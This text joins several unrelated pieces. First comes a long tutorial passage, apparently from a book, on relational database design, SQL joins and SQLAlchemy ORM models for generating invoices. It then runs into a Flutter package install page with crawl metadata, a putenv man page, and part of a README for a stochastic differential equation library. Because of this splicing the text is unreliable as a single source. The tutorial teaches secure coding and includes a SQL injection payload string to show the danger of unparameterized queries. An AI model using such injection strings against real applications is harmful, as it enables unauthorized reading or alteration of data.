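Unlike a CSV file, where "1.25" would come back as a string, the database returns the value with its declared type.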
The CSV files that allowed our imaginary company to track customers, orders, and products were small enough to include diagrams, as was shown previously. However, in real systems, the number of rows and columns can be extensive, which wouldn’t lend itself to the same kind of diagrams.
Tables in a database can be represented graphically as part of an Entity Relationship Diagram, or ERD. Rather than show the rows and columns that make up a table, the column and data type information for a record is shown. As an example, here is the database table representing the customer information:
The diagram header is the table name, and each row represents a column in the database table. Here the three columns in the diagram provide information about the database column. The second is the column name, and the third is the column data type.
The first column in the diagram provides additional information about the column. In the example above, the first row has the abbreviation PK. PK is shorthand for Primary Key, which is the unique id associated with each row of data in the table.
The order CSV file contained nothing but unique id values, one for the row unique id and two others to connect to the customer and address CSV file rows. The ERD for the order table is presented here:
Just like the customer table has three columns describing the database columns of the table, the order table has three columns for the data it maintains. The new FK abbreviation is shorthand for Foreign Key. A Foreign Key creates a relationship between two tables by referencing the Primary Key of another table.
Relationships
As important as storing and modifying data is to any application, the relationships between the data are just as important. The updated CSV files enabled us to reduce the original single CSV file’s data redundancy.
The separation of distinct data into separate tables does mean there needs to be a way to reconnect related data. RDBMS systems establish relationships between multiple tables with the use of Primary and Foreign Keys.
The Primary Key in a database table is a column in a row (a record) whose value is unique across the entire table. It’s often the case the Primary Key column exists for the sole purpose of providing this unique id value and provides no information about the record itself.
Most RDBMS systems have functionality to create auto-incrementing integer values when new rows are inserted into a table. These make convenient Primary Key values that are assured to be unique across the table as new records are inserted into the table and the value increments.
The existence of Primary Keys, and their use as Foreign Keys in other tables, allows relationships to exist between tables.
One To Many
In our example, there is a relationship between customers and orders. A customer can create zero to many orders for products, but each order is related to only one customer. This kind of relationship is called One-To-Many.
To establish a One-To-Many relationship, the unique customer_id value from the customer table is also present as a column of data in the order table as customer_id. The customer_id value is a Foreign Key relating to the customer table. Any number of order records can have the same customer_id value, creating the One-To-Many relationship.
When creating a Foreign Key in a table, part of the definition given to the database engine is to what table the Foreign Key relates. The Foreign Key tells the database engine there’s a relationship and helps it provide the functionality to use that relationship.
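A minimal sketch of declaring and enforcing such a Foreign Key in SQLite via sqlite3 (table and column names follow the article; note SQLite only enforces foreign keys when the pragma is enabled):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("PRAGMA foreign_keys = ON")  # SQLite enforces foreign keys only when asked
conn.execute("CREATE TABLE customer (customer_id INTEGER PRIMARY KEY, name TEXT)")
conn.execute(
    """CREATE TABLE "order" (
           order_id INTEGER PRIMARY KEY,
           customer_id INTEGER REFERENCES customer(customer_id)
       )"""
)
conn.execute("INSERT INTO customer (name) VALUES ('Joe')")
conn.execute('INSERT INTO "order" (customer_id) VALUES (1)')  # two orders, one customer
conn.execute('INSERT INTO "order" (customer_id) VALUES (1)')
count = conn.execute('SELECT COUNT(*) FROM "order" WHERE customer_id = 1').fetchone()[0]
print(count)  # 2

# A foreign key pointing at a customer that doesn't exist is rejected
try:
    conn.execute('INSERT INTO "order" (customer_id) VALUES (99)')
except sqlite3.IntegrityError as exc:
    print("rejected:", exc)
```

The declared relationship is what lets the database refuse an order that points at a nonexistent customer.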
Many To Many
Our imaginary company also establishes another kind of relationship. An order can have many items, each related to a product. At the same time, a product can be part of many items. A relationship like this is called a Many-To-Many.
Establishing a Many-To-Many relationship is more involved and, in some ways, can be thought of as a One-To-Many relationship connected to a Many-To-One relationship. Creating this requires an association table that acts as the "many" side of both relationships just mentioned.
The item table creates the association between the order and product tables. The item table has a Foreign Key to the order table and a Foreign Key to the product table.
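A sketch of the association table in SQLite (sample ids and quantities are invented; the composite primary key on order_id plus product_id is one common way to define such a table):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript(
    """
    CREATE TABLE "order" (order_id INTEGER PRIMARY KEY);
    CREATE TABLE product (product_id INTEGER PRIMARY KEY, name TEXT);
    CREATE TABLE item (
        order_id INTEGER REFERENCES "order"(order_id),
        product_id INTEGER REFERENCES product(product_id),
        qty INTEGER,
        PRIMARY KEY (order_id, product_id)
    );
    INSERT INTO "order" (order_id) VALUES (1), (2);
    INSERT INTO product (product_id, name) VALUES (1, 'widget'), (2, 'thingy');
    -- order 1 holds both products; the widget appears in both orders
    INSERT INTO item VALUES (1, 1, 2), (1, 2, 3), (2, 1, 5);
    """
)
rows = conn.execute(
    """SELECT p.name, COUNT(*)
       FROM item i JOIN product p ON p.product_id = i.product_id
       GROUP BY p.name ORDER BY p.name"""
).fetchall()
print(rows)  # [('thingy', 1), ('widget', 2)]
```

The query counts how many items reference each product, showing the same product participating in multiple orders through the association table.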
Transaction Database
The transaction database you’ll create uses a naming convention for the tables and the columns within those tables. The tables are named using singular nouns for what they contain: customer, product, etc. The naming convention seems counter-intuitive since a table has multiple records, and the plural version of the noun might seem more fitting.
The table is defined in terms of one row of data and the data types and meanings of the record’s columns. How the table is accessed can return one or more records, but the table itself is configured based on a single record.
Additionally, it can get surprisingly awkward to use plurals when naming tables. Plus, good developers are lazy, and the singular versions are shorter and require less typing when working with them.
The Primary Key columns are named using a convention of the table name appended with “_id”. While seemingly redundant and wordy as the Primary Key name, it’s quickly apparent the column is a Foreign Key when used in another table.
Creating an ERD for the transaction database generates this:
This diagram represents the transaction database table’s structure and the relationships between them using common database ERD notation and symbols. Notice how the connection between tables goes from Primary Key in one table to Foreign Key in another.
The connecting lines are all variations of One-To-Many relationships. The existence of the Item table creates the Many-To-Many relationship between the Order ⇔ Items ⇔ Product tables.
Creating, updating, and interacting with the data in an RDBMS system uses the Structured Query Language (SQL) most RDBMS systems provide.
Structured Query Language: SQL
Accessing the functionality of a database is standardized, so any programming language that has a library available to connect to the database can use it. This standardization makes the database much easier to share between applications than a proprietary system.
Much of the standardized functionality of RDBMS systems are exposed to the user by using Structured Query Language, or SQL. SQL interacts with an RDBMS system as a declarative programming language. A declarative language lets you express what you want a computer system to do and not explicitly instruct the system on how to perform that task.
One way to think about this would be going to a bakery and asking for a cake. You expect that the baker will give you a cake, not hand you a recipe so you can make the cake yourself.
Getting Data
You’ll be creating the transaction database later in this article, but here I’ll show some SQL queries to access data. This SQL statement:
SELECT * FROM customer;
Returns these results:
customer_id  name
-----------  ----------
1            Joe
2            Mary
3            Sue
The SQL command keywords are in uppercase, which is just a convention. The statement asks the database to return all rows from the customer table. The "*" character is a wildcard to get all columns for each row returned. The ";" character at the end of the SQL statement is the terminator for the command.
This SQL query asks for only the names in the customer database sorted in descending alphabetical order:
SELECT name FROM customer ORDER BY name DESC;

name
----------
Sue
Mary
Joe
SQL also provides functions that transform and use the data. The statement below returns the number of customers:
SELECT COUNT(*) AS 'Total Customers' FROM customer;

Total Customers
---------------
3
The COUNT function returns the total number of results produced by the query and assigns that value to the alias 'Total Customers', used as the column heading for the output results.
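The three queries above can be reproduced from a host language; here is a sketch using Python's stdlib sqlite3 against a throwaway table populated with the sample names from the article's output:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE customer (customer_id INTEGER PRIMARY KEY, name TEXT)")
conn.executemany("INSERT INTO customer (name) VALUES (?)", [("Joe",), ("Mary",), ("Sue",)])

rows = conn.execute("SELECT * FROM customer").fetchall()
print(rows)   # [(1, 'Joe'), (2, 'Mary'), (3, 'Sue')]

names = [r[0] for r in conn.execute("SELECT name FROM customer ORDER BY name DESC")]
print(names)  # ['Sue', 'Mary', 'Joe']

total = conn.execute("SELECT COUNT(*) AS 'Total Customers' FROM customer").fetchone()[0]
print(total)  # 3
```

The SQL is identical whether typed into a database shell or sent through a library; only the surrounding plumbing changes.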
Using Relationships
Because the tables in the transaction database represent normalized data without redundancies, making interesting queries requires using relationships. In this SQL statement, the customers, all the addresses used for their orders, and the number of times they've used each address for an order are returned, sorted alphabetically by name:
SELECT c.name, a.street, a.zipcode, COUNT(c.name) AS 'Times Used'
FROM customer c
JOIN 'order' o ON o.customer_id = c.customer_id
JOIN address a ON a.address_id = o.address_id
GROUP BY a.street
ORDER BY c.name;

name        street      zipcode  Times Used
----------  ----------  -------  ----------
Joe         12 Main St  12345    2
Mary        127 Margol  40322    1
Mary        41 Orange   40321    1
Sue         212 Grove   34213    1
Here the SQL statement spans multiple lines, which works fine as the statement isn’t completed until the final “;” character. As before, only some values from the tables are returned, but those values span multiple tables.
Initially, the query starts at the customer table and assigns it an alias, a shorthand used in other parts of the query to reduce ambiguity. To get the customer address used with each order, the query needs to use the relationships between the customer, order, and address tables. Using the "JOIN" keyword achieves this. It tells the database how to connect one table to another using the Primary Key from one to the Foreign Key of another.

The Primary Key from one table must equal the Foreign Key of the other for that row to be part of the results. The "ON" keyword provides the condition to be met to include the data.

Notice the 'order' table is in single quotes in the first "JOIN" clause. The single quotes are necessary because the word order is a SQL keyword; placing it in single quotes tells SQL to interpret 'order' as the table name rather than a keyword.

The "GROUP BY a.street" clause tells SQL to aggregate the results based on identical street values. The results returned indicate this. For example, Joe has two orders but used the same address for both. Mary also has two orders but used a different address for each one.
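A runnable sketch of the same join-and-group pattern, using a reduced subset of the article's data (only two customers and two addresses) with Python's sqlite3:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript(
    """
    CREATE TABLE customer (customer_id INTEGER PRIMARY KEY, name TEXT);
    CREATE TABLE address (address_id INTEGER PRIMARY KEY, street TEXT);
    CREATE TABLE "order" (
        order_id INTEGER PRIMARY KEY,
        customer_id INTEGER REFERENCES customer(customer_id),
        address_id INTEGER REFERENCES address(address_id)
    );
    INSERT INTO customer (name) VALUES ('Joe'), ('Mary');
    INSERT INTO address (street) VALUES ('12 Main St'), ('41 Orange');
    -- Joe ordered twice to the same address, Mary once
    INSERT INTO "order" (customer_id, address_id) VALUES (1, 1), (1, 1), (2, 2);
    """
)
rows = conn.execute(
    """SELECT c.name, a.street, COUNT(*) AS times_used
       FROM customer c
       JOIN "order" o ON o.customer_id = c.customer_id
       JOIN address a ON a.address_id = o.address_id
       GROUP BY c.name, a.street
       ORDER BY c.name"""
).fetchall()
print(rows)  # [('Joe', '12 Main St', 2), ('Mary', '41 Orange', 1)]
```

Joe's two orders collapse into one aggregated row because both used the same street, exactly the behavior described above.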
The SQL to get the data to build invoices for all the orders our imaginary company has is written like this:
SELECT c.name, a.street, a.zipcode, o.order_id, p.name, i.qty
FROM 'order' o
JOIN customer c ON c.customer_id = o.customer_id
JOIN address a ON a.address_id = o.address_id
JOIN item i ON o.order_id = i.order_id
JOIN product p ON p.product_id = i.product_id;
And returns these results:
name        street      zipcode  order_id  name    qty
----------  ----------  -------  --------  ------  ---
Joe         12 Main St  12345    1         widget  2
Joe         12 Main St  12345    1         thingy  3
Joe         12 Main St  12345    2         thingy  5
Mary        41 Orange   40321    3         widget  1
Mary        41 Orange   40321    3         thingy  9
Mary        127 Margol  40322    4         widget  7
Sue         212 Grove   34213    5         widget  3
This SQL query joins all the tables in the transaction database to recreate the redundant data for customers, orders, addresses, products, and items.
SQLAlchemy
SQLAlchemy is a popular and powerful database access library for Python that provides an Object-Relational Mapper (ORM). One of the benefits of working with Python is that it’s an object-oriented language and everything in Python is an object. Working with data as Python objects feels more natural and more Pythonic.
Python can access database systems using SQL, and this is a viable approach. Most Python database libraries that support SQL return lists of tuples or dictionaries containing the results of the SQL statement.
The SQL statement illustrating how to get the data to create invoices for orders shows the data, but all relationship information is lost. To use this data would require software to glean the hierarchical relationships in orders ⇔ items ⇔ products. The disconnect between objects and flat data is known as the object-relational impedance mismatch, and it’s a problem the SQLAlchemy ORM solves.
Benefits
Using SQLAlchemy to access a database allows you to think about objects and methods rather than SQL and result sets. For the most part, you don’t need to know SQL to work with the underlying database. Instead, SQLAlchemy builds the necessary SQL statement to map the resulting data to Python objects and vice versa.
Most RDBMS databases support SQL; however, they often add proprietary functionality to their implementation. Aside from specific use cases, SQLAlchemy abstracts these differences from you and works at a higher level.
Another advantage SQLAlchemy provides is protecting your application from SQL injection attacks. For example, if your application adds user-supplied information to database queries, your application is vulnerable to this kind of attack.
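For context, here is a sketch of the vulnerability and its standard fix using plain sqlite3 and parameterized queries (the payload string is a classic illustrative example, not from the book):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE customer (customer_id INTEGER PRIMARY KEY, name TEXT)")
conn.execute("INSERT INTO customer (name) VALUES ('Joe')")

user_input = "Joe' OR '1'='1"  # a classic injection payload

# Vulnerable: the user's text is pasted straight into the statement,
# so the OR clause becomes part of the SQL and matches every row
unsafe = f"SELECT COUNT(*) FROM customer WHERE name = '{user_input}'"
hits_unsafe = conn.execute(unsafe).fetchone()[0]
print(hits_unsafe)  # 1

# Safe: a '?' placeholder treats the input purely as data
hits_safe = conn.execute(
    "SELECT COUNT(*) FROM customer WHERE name = ?", (user_input,)
).fetchone()[0]
print(hits_safe)  # 0, no customer is literally named "Joe' OR '1'='1"
```

An ORM like SQLAlchemy builds its statements with bound parameters in the same spirit, which is why it shields you from this class of attack.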
Exploits of a Mom (xkcd)
Modeling the Database
Connecting the database to SQLAlchemy requires modeling the table structures with Python class definitions. The models map the table record structure, and the relationships between tables, to Python classes. Instances of these Python classes are created by calling methods on the classes, which SQLAlchemy translates to SQL statements.
Because the ultimate goal is to use SQLAlchemy with the MyBlog application, we’ll use Flask and the flask_sqlalchemy modules to help define the classes. The flask_sqlalchemy module provides convenience features and definitions, but the classes defined here could just as easily have been defined with the SQLAlchemy module alone.
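For comparison, here is a rough sketch of how the Customer/Order pair from the next section could be defined with plain SQLAlchemy, without Flask. This assumes SQLAlchemy 1.4 or later is installed and mirrors the article's table and column names; it is not the book's code:

```python
from sqlalchemy import Column, ForeignKey, Integer, String, create_engine
from sqlalchemy.orm import backref, declarative_base, relationship, sessionmaker

Base = declarative_base()

class Customer(Base):
    __tablename__ = "customer"
    customer_id = Column(Integer, primary_key=True)
    name = Column(String)
    orders = relationship("Order", backref=backref("customer"))

class Order(Base):
    __tablename__ = "order"  # SQLAlchemy quotes the reserved word for us
    order_id = Column(Integer, primary_key=True)
    customer_id = Column(Integer, ForeignKey("customer.customer_id"))

engine = create_engine("sqlite://")  # in-memory database
Base.metadata.create_all(engine)

session = sessionmaker(bind=engine)()
joe = Customer(name="Joe")
joe.orders.append(Order())  # relationship attribute, no explicit foreign key needed
session.add(joe)
session.commit()
print(joe.orders[0].customer.name)  # Joe
```

The flask_sqlalchemy versions in the article wrap these same constructs in the db object for convenience.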
Defining the Classes
The examples/02/main.py example program imports a models.py module. The models.py module contains all of the code to create the database object, model the tables, and populate the database with data from the CSV files of examples/01.
The Database Connection
All of the classes to be defined inherit from a common SQLAlchemy provided database object. The database object is created prior to defining the classes and is created in this way:
app = Flask(__name__)                                                   #A
app.config["SQLALCHEMY_DATABASE_URI"] = "sqlite:///transaction.sqlite"  #B
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False                    #C
db = SQLAlchemy(app, session_options={"autoflush": False})              #D
#A Create the Flask instance
#B Configure SQLAlchemy to use SQLite and where to create the database file
#C Turn off an unnecessary default configuration that generates a warning
#D Creates the SQLAlchemy database object, in this case with autoflush turned off
The intent of the code above is to create the db object instance used to define the table models. The database itself is stored in the single file "transaction.sqlite". The "sqlite://" prefix on the URI connection string indicates using the SQLite database system.
Modeling The Tables
The transaction database ERD shown previously is a pretty good guide to create the class definitions needed to access the database with SQLAlchemy. The class definitions define the database table to create, the column names within a record, and their data type.
There are also fields defined that don’t exist in the database but are created and maintained by SQLAlchemy when instances of the models are created. These extra fields give you useful functionality when working with the model instances, particularly relationships between tables.
Let’s look at the Customer and Order class definitions:
class Customer(db.Model):                                              #A
    __tablename__ = "customer"                                         #B
    customer_id = db.Column(db.Integer, primary_key=True)              #C
    name = db.Column(db.String)                                        #D
    orders = db.relationship("Order", backref=db.backref("customer"))  #E
#A Create the class, inheriting from the db instance Model class
#B Associate the class definition with the customer database table
#C Create the customer_id column as an integer type and as the primary_key
#D Create the name column as a string
#E Create the instance only attribute orders, connecting a customer to all their orders
class Order(db.Model):                                                            #A
    __tablename__ = "order"                                                       #B
    order_id = db.Column(db.Integer, primary_key=True)                            #C
    customer_id = db.Column(db.Integer, db.ForeignKey("customer.customer_id"))    #D
    address_id = db.Column(db.Integer, db.ForeignKey("address.address_id"))       #E
#A Create the class, inheriting from the db instance Model class
#B Associate the class definition with the order database table
#C Create the order_id column as an integer type and as the primary_key
#D Create the customer_id as an integer and foreign_key to the customer table and customer_id field
#E Create the address_id as an integer and foreign key to the address table and address_id field
There’s quite a bit going on in these class definitions. By inheriting from the db.Model class, the Customer and Order classes get SQLAlchemy functionality allowing them to interact with the underlying database.

The customer_id column is defined as an integer and as the Primary Key. By doing this, the customer_id field is initialized by an auto-incrementing function every time a new Customer instance is added to the database. The same happens for the order_id field in the Order class.
The name column is a simple string that maps to whatever database type best supports Python string type variables. Since SQLite is the underlying database, that type is TEXT.
The Customer class attribute orders is interesting and useful. It does not define a column in the database customer table at all. Instead, it creates an attribute maintained by SQLAlchemy that is available to you as a developer.

The orders attribute uses the relationship established by the customer_id Foreign Key created in the Order class. A Customer instance has an orders attribute that is a Python list of the Order instances associated with the customer.
The odd-looking backref parameter passed to db.relationship(…) creates an SQLAlchemy-maintained attribute named customer in the Order class definition that points back to the Customer instance to which the order relates. Conceptually the relationships look like this:

The orders attribute lets you write Python code like this when you have a Customer instance:
print(f"Customer {customer.name} has these order numbers:")
for order in customer.orders:
    print(f"Order number: {order.order_id}")
The relationships and the attributes created and maintained by SQLAlchemy are very useful when printing out the order invoices. The rest of the SQLAlchemy model definitions follow:
class Address(db.Model):
    __tablename__ = "address"
    address_id = db.Column(db.Integer, primary_key=True)
    street = db.Column(db.String)
    zipcode = db.Column(db.String)
    orders = db.relationship("Order", backref=db.backref("address"))


class Product(db.Model):
    __tablename__ = "product"
    product_id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String)


class Item(db.Model):                                                                          #A
    __tablename__ = "item"                                                                     #B
    order_id = db.Column(db.Integer, db.ForeignKey("order.order_id"), primary_key=True)        #C
    product_id = db.Column(db.Integer, db.ForeignKey("product.product_id"), primary_key=True)  #D
    qty = db.Column(db.Integer)                                                                #E
    order = db.relationship("Order", backref=db.backref("items"))                              #F
    product = db.relationship("Product")                                                       #G
#A Create the class, inheriting from the db instance Model class
#B Associate the class with the item database table
#C Create the order_id as an integer and foreign_key to the order table and order_id field
#D Create the product_id as an integer and foreign_key to the product table and product_id field
#E Create the qty field to track the quantity of product for this item
#F Create the instance only attribute order, connecting an order to this item
#G Create the instance only attribute product, connecting a product to this item
The Item class definition creates the many-to-many association relationship between an order, the items in that order, and the products related to those items.
Creating and Using the Database
Once the SQLAlchemy models are defined, the database can be created. This line of Python code creates the database:
db.create_all()
If the transaction.sqlite SQLite database file defined earlier doesn’t exist, it’s created with the table structures defined by the models, and those tables will be empty. However, if the transaction.sqlite database file does exist, the code above won’t re-create it; it will just connect to it.
It’s essential to recognize any changes made to the SQLAlchemy models won’t appear in the database if the database already exists. You can delete and recreate the database, and it will match the models, which is fine in this case but an unreasonable action most of the time.
With an existing database, you’ll need to use SQL statements, or other database tools, to modify the database to match the SQLAlchemy models. As a working developer, it’s not common to create a database from scratch. The more frequent activity is modifying an existing database to add new features and functionality to it.
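A sketch of one such in-place modification with SQLite's ALTER TABLE, using an invented email column to stand in for a new model field:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE customer (customer_id INTEGER PRIMARY KEY, name TEXT)")
conn.execute("INSERT INTO customer (name) VALUES ('Joe')")

# Later the model grows an email column, so the live table is altered to match,
# preserving the existing rows
conn.execute("ALTER TABLE customer ADD COLUMN email TEXT")
conn.execute("UPDATE customer SET email = 'joe@example.com' WHERE name = 'Joe'")
row = conn.execute("SELECT name, email FROM customer").fetchone()
print(row)  # ('Joe', 'joe@example.com')
```

In practice this kind of schema change is usually scripted so it can be applied consistently to development and production databases.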
Inserting Data
Even though creating and populating a database from scratch isn’t an everyday activity for a developer, we’ll look at the examples/02/models.py module to see how SQLAlchemy creates and inserts database table records.

The program’s goal in examples/02/main.py is to replicate the behavior of examples/01/main.py but use a database instead of CSV files. To do so means parsing the CSV files and inserting the data into the database using SQLAlchemy. The models.py module contains the SQLAlchemy models and the statement to create the database. It also has a custom function to read the CSV files and load them into the database tables.
def load_database():
    customers = CsvData("customer.csv")  #A
    addresses = CsvData("address.csv")   #A
    orders = CsvData("order.csv")        #A
    products = CsvData("product.csv")    #A
    items = CsvData("item.csv")          #A

    with session_manager() as session:  #B
        # create the customers
        for customer in customers.data.values():  #C
            session.add(Customer(name=customer.get("name")))  #C

        # create addresses
        for address in addresses.data.values():  #D
            session.add(Address(
                street=address.get("street"),
                zipcode=address.get("zipcode")
            ))  #D

        # create products
        for product in products.data.values():  #E
            session.add(Product(name=product.get("name")))  #E

        # commit these items
        session.commit()  #F

        # build a map of orders
        orders_map = {
            str(index): Order()
            for index, order in enumerate(orders.data.values(), start=1)
        }  #G

        # build the orders and items
        for item in items.data.values():  #H
            # get the order_id and order associated with this item
            order_id = item.get("order_id")   #I
            order = orders_map.get(order_id)  #I

            # get the customer, address and product associated with the item
            customer_id = orders.data.get(order_id).get("customer_id")  #J
            customer = session.query(Customer).filter(
                Customer.customer_id == customer_id
            ).one_or_none()  #J
            address_id = orders.data.get(order_id).get("address_id")  #K
            address = session.query(Address).filter(
                Address.address_id == address_id
            ).one_or_none()  #K

            if order.customer is None:     #L
                order.customer = customer  #L
            if order.address is None:      #L
                order.address = address    #L

            # create an item with its many-to-many associations
            product_id = item.get("product_id")  #M
            product = session.query(Product).filter(
                Product.product_id == product_id
            ).one_or_none()  #M
            new_item = Item(qty=item.get("qty"))  #M
            new_item.product = product            #M
            order.items.append(new_item)          #M

        # add the populated orders to the session and database
        for order in orders_map.values():  #N
            session.add(order)             #N
        session.commit()                   #N
#A Load all of the CSV files into variables that are rows of dictionaries
#B Use a context manager to control when the objects are committed (or not) to the database
#C Create Customer instances and add them to the database session
#D Create Address instances and add them to the database session
#E Create Product instance and add them to the database session
#F Commit the session to the database, assigning unique ids to all the objects in that session and persisting them in the database
#G Create an orders map to help connect orders, items, customers, and products together
#H Iterate over the items
#I Find the order the current item is related to
#J Find the customer to which the found order is related. The second statement is an SQLAlchemy query to get the customer instance
#K Find the address to which the found order is related. The second statement is an SQLAlchemy query to get the address instance
#L Assign the customer and address to the order only if they don’t already exist
#M Find the product instance to relate to the item, assign it to the item and then append the item to the order
#N Add all the initialized orders to the session and commit the session to the database, persisting the orders and items
There is quite a lot going on in the code above. The gist is to read the CSV files and use the data to create instances of the corresponding SQLAlchemy models. Then use the SQLAlchemy maintained attributes to develop the relationships between the instances.
Creating the customer, address, and product instances and then persisting them to the database with the session.commit() statement generates the unique id Primary Key value for each record. The Primary Key values are used later to establish relationships when creating the orders and the items in those orders.
Using the Data
The examples/02/main.py program demonstrates using the transaction.sqlite database to generate the invoice PDF files for all the orders.
import os
import csv
import sqlite3
from pathlib import Path

from jinja2 import Environment, FileSystemLoader
from weasyprint import HTML

from models import load_database, Order, session_manager  #A


def create_invoice(order):  #B
    """Create the PDF invoice for the order

    Args:
        order (Order): The order to generate the invoice with
    """
    invoice_filename = f"invoice_{order.order_id}.pdf"

    # delete existing order invoice file if exists
    if os.path.exists(invoice_filename):
        os.remove(invoice_filename)

    # set up Jinja2 to generate the HTML and then the PDF file
    path = Path(__file__).parent
    env = Environment(loader=FileSystemLoader(Path(path)))
    template = env.get_template("invoice_template.jinja")
    html_out = template.render(order=order)  #C
    HTML(string=html_out).write_pdf(
        invoice_filename,
        stylesheets=[
            "page.css",
            "bootstrap.css",
        ]
    )


# load the database
load_database()  #D

# generate an invoice file for all the orders
with session_manager() as session:            #E
    for order in session.query(Order).all():  #E
        create_invoice(order)                 #E
#A Import functionality from the models.py module. Notice only the SQLAlchemy Order definition is used
#B Pass a single Order instance to the create_invoice function
#C Pass the single Order instance to the Jinja template as the context parameter
#D Call the load_database function defined in the models.py module to populate the database
#E With a database session, query the database for all orders, iterate over them and pass the single instances to the create_invoice function
The bulk of this program creates the invoice PDF files from the single SQLAlchemy Order instance passed to it. Because of the relationships established by the models, everything necessary to print an invoice is connected to the Order instance.
The Jinja template uses the order context parameter to fill in the dynamic parts of the template:
<html lang="en">
  <head>
    <title>Invoice</title>
  </head>
  <body>
    <div class="container border border-dark border-2 rounded-2">
      <div class="container border border-dark mt-3 mb-3">
        <h3>Invoice</h3>
        Customer: {{order.customer.name}}<br />    #A
        Street: {{order.address.street}}<br />     #B
        Zip Code: {{order.address.zipcode}}<br />  #B
        Order Number: {{order.order_id}}<br />     #C
      </div>
      <table class="table table-striped table-bordered caption-top">
        <caption>Order Items</caption>
        <thead>
          <tr>
            <th>Item Number</th>
            <th>Product Name</th>
            <th>Quantity</th>
          </tr>
        </thead>
        <tbody>
          {% for item in order.items %}      #D
          <tr>                               #D
            <td>{{loop.index}}</td>          #D
            <td>{{item.product.name}}</td>   #D
            <td>{{item.qty}}</td>            #D
          </tr>                              #D
          {% endfor %}                       #D
        </tbody>
      </table>
    </div>
  </body>
</html>
#A Use the order instance customer attribute to get the customer’s name
#B Use the order instance address attribute to get the address the order was shipped to
#C Print out the order’s unique id value
#D Use the order instance items collection to print out the item information in a table
By creating models for the tables, with relationships between them, SQLAlchemy provides attributes to access the data hierarchically rather than in a flat, two-dimensional way.

The models, and the object instances created from them, let you think about the data in Pythonic ways rather than manage relationships yourself and jump from list to dictionary and back.

The examples in this article, with their simple data requirements, allowed us to see how databases can greatly enhance merely persisting data. By adding relationships to the data structure, the storage of interrelated data is greatly simplified, and functionality is improved.
That’s all for this article. If you want to see more of the book, check it out on Manning’s liveBook platform here.
on_connectivity_widget 1.0.2
Use this package as a library
Depend on it
Run this command:
With Flutter:
$ flutter pub add on_connectivity_widget
This will add a line like this to your package's pubspec.yaml (and run an implicit flutter pub get):
dependencies:
  on_connectivity_widget: ^1.0.2
Alternatively, your editor might support flutter pub get. Check the docs for your editor to learn more.
Import it
Now in your Dart code, you can use:
import 'package:on_connectivity_widget/on_connectivity_widget.dart'; | https://pub.dev/packages/on_connectivity_widget/install | CC-MAIN-2022-05 | en | refinedweb |
NAME
putenv - change or add an environment variable
SYNOPSIS
#include <stdlib.h>

int putenv(const char *string);
DESCRIPTION
The putenv() function adds or changes the value of environment variables. The argument string is of the form name=value. If name does not already exist in the environment, then string is added to the environment. If name does exist, then the value of name in the environment is changed to value. The string pointed to by string becomes part of the environment, so altering the string changes the environment.
RETURN VALUE
The putenv() function returns zero on success, or -1 if an error occurs.
ERRORS
ENOMEM Insufficient space to allocate new environment.
NOTES
CONFORMING TO
SVID 3, POSIX, BSD 4.3
SEE ALSO
getenv(3), setenv(3), unsetenv(3), environ(5) | https://dyn.manpages.debian.org/unstable/manpages-pt-dev/putenv.3.pt.html | CC-MAIN-2022-05 | en | refinedweb |
This package implements functionalities for working with Stochastic Differential Equations models (SDEs for short).
It includes simulation routines as well as estimation methods based on observed time series.
Conceptually the information required to describe an SDEs can be divided in three groups: model, sampling and data.
The `sdelearn` class is the main class of this package, dedicated to the interaction with the user.

How to create a `sdelearn` class?
A `sdelearn` class is based on three dedicated subclasses, `SdeModel`, `SdeSampling` and `SdeData`, containing information about the model, the sampling structure and the observed data respectively. First these three classes must be created:
`SdeModel`: contains information about the Sde model, in particular the "actual" Sde formula. It is assumed to be a parametric model, i.e. the functional form of the model is known up to some parameters. In order to construct this class the user is required to supply: two functions, a drift function (`drift`) and a diffusion function (`diff`); an array-like object `mod_shape` containing the dimensions of the model, of the form [`n_var`, `n_noise`], where the first dimension represents the number of variables and the second the number of Gaussian noises; a dictionary `par_names` with keys `"drift"` and `"diffusion"`, with values given by character lists containing all the parameter names appearing in the corresponding drift and diffusion function, e.g. `par_names = {"drift": ["par_dr1", "par_dr2", ...], "diffusion": ["par_di1", "par_di2", ...]}` (this argument is optional and parameter names can be set later using the function `set_param`); a character list `var_names` containing variable names; if missing, it is automatically set to `X0`, `X1`, ..., `X[n_var]`.
The `mode` argument controls the way the model is specified. There are two ways to supply the drift and diffusion components of the model: "symbolic" or "functional" mode.
Symbolic mode. In symbolic mode (`mode="sym"`, the default) the drift and diffusion are supplied as lists of `sympy` expressions, where all the non-constant values, i.e. parameters and state variables, are expressed as `sympy` symbols. All the mathematical functions used in the expressions have to be imported from `sympy`, e.g. use `sympy.sqrt` instead of `math.sqrt`. The length of the `drift` list has to match the number of variables in the model, `n_var`. Similarly, the `diff` argument has to be a matrix-like object or nested list of length `n_var`, where the length of `diff[0]` is `n_noise`.
Function mode. This is specified by `mode="fun"`. The drift function must be a vector-valued function taking two arguments: the state value and the parameters. The input state should be a numeric vector or list; the parameters should be a dictionary. The value returned by this function must match the number of variables `n_var` in the model. Similarly, the diffusion function of the model must be supplied as a matrix-valued function, which takes as input the current state and a dictionary containing the parameters. The dimensions of the output value of the diffusion function must match the number of variables and noises supplied: i.e. it must be an `n_var` x `n_noise` matrix. Drift and diffusion functions can be scalar valued. The parameters must be addressed by name in both these functions, i.e. as keys in a dictionary. Note that names are important here: names used in the drift and diffusion function definitions must be consistent with those supplied as initial values for estimation or simulation (`simulate`). See the examples for details. As a rule of thumb, the models should be supplied as you'd write them with "pen and paper";
`SdeSampling`: contains information about the temporal sampling of the data. It is constructed by supplying the time of the initial observation `initial` (typically `initial=0`), the last observed time `terminal`, and one of either `delta`, the time span between each pair of observations (assumed constant), or `n`, the number of points in the grid (including endpoints). If `delta` is given, the terminal value might not be matched exactly and will be replaced by the largest value in the grid <= terminal. A time grid corresponding to the observation times is automatically generated;
`SdeData`: contains empirically observed or simulated data. It should be a data frame where each row corresponds to an observation of the time series. The observation times should match the time grid supplied in the sampling information: that is, the number of rows in `SdeData.data` should be equal to the length of the grid `SdeSampling.grid`.
